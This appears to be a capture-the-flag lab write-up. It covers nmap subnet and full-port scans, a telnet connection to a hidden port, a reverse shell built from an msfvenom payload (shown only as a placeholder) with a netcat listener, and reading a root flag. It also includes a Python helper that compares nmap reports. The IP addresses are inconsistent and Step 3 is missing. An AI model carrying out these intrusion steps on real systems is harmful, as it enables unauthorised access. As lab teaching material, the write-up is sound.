Part D ZW
Step 1:
Narrow down the candidates for the server IP hosting the TELNET server by retrieving my
device IP address using $ ifconfig.
Next, perform an nmap scan of the subnet my device is on with $ nmap -sS 192.168.1.0/24
The /24 fixes the first 24 bits of the address and limits the scope of scanning to the hosts
between 192.168.1.0 and 192.168.1.255.
Output below is the scan report from the command:
It is safe to assume that the IP address with the most open ports among all the IP addresses in
the output hosts the TELNET server.
To probe this address, the command $ nmap -p- 192.168.0.192 is used to scan every TCP port
(1 to 65535) on this IP address, including the hidden ports that the default scan does not cover.
By comparing this output with the first output, it becomes clear that the ports numbered
8015 or greater are the hidden ports. Therefore, it is plausible that the TELNET server is
listening on one of the hidden ports.
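The comparison described above can be automated when auditing hosts for listeners that a default scan misses. The following is an added example, not part of the original write-up: it parses two nmap normal-format reports and lists the ports that are open only in the -p- scan. The report text, the port list and the function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample reports in nmap's normal output format (not this write-up's scans).
DEFAULT_SCAN = """\
Nmap scan report for 192.168.1.164
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
"""

FULL_SCAN = """\
Nmap scan report for 192.168.1.164
Not shown: 65531 closed ports
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
8015/tcp open     unknown
8020/tcp filtered unknown
"""

# Header is either "... for 10.0.0.1" or "... for name (10.0.0.1)".
HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?([0-9.]+)\)?$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")

def open_ports(report):
    """Map each host to {(port, proto): service} for ports in state 'open'."""
    hosts = defaultdict(dict)
    current = None
    for line in report.splitlines():
        line = line.strip()
        m = HOST_RE.match(line)
        if m:
            current = m.group(1)
            continue
        m = PORT_RE.match(line)
        if m and current and m.group(3) == "open":
            hosts[current][(int(m.group(1)), m.group(2))] = m.group(4)
    return hosts

def only_in_full(default_report, full_report):
    """Per host, the open ports that appear in the -p- scan but not the default scan."""
    base, full = open_ports(default_report), open_ports(full_report)
    found = {}
    for host, ports in full.items():
        extra = sorted(set(ports) - set(base.get(host, {})))
        if extra:
            found[host] = extra
    return found
```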
Step 2:
To test whether the above assumption is correct, the command $ telnet 192.168.1.164 8015 is
used to attempt a telnet connection to the server.
Step 4:
Start a reverse shell via the telnet session on the server with the command $.RUN [output from msfvenom]
At the same time, start a netcat listener to listen for the connection from the server with the
command $ nc -nvlp 2233
The connection to the Telnet server will be established once the reverse shell is activated.
Step 5:
Extract the contents of root.txt to obtain the final flag with the command $ cat root.txt
The output shown is the final flag value.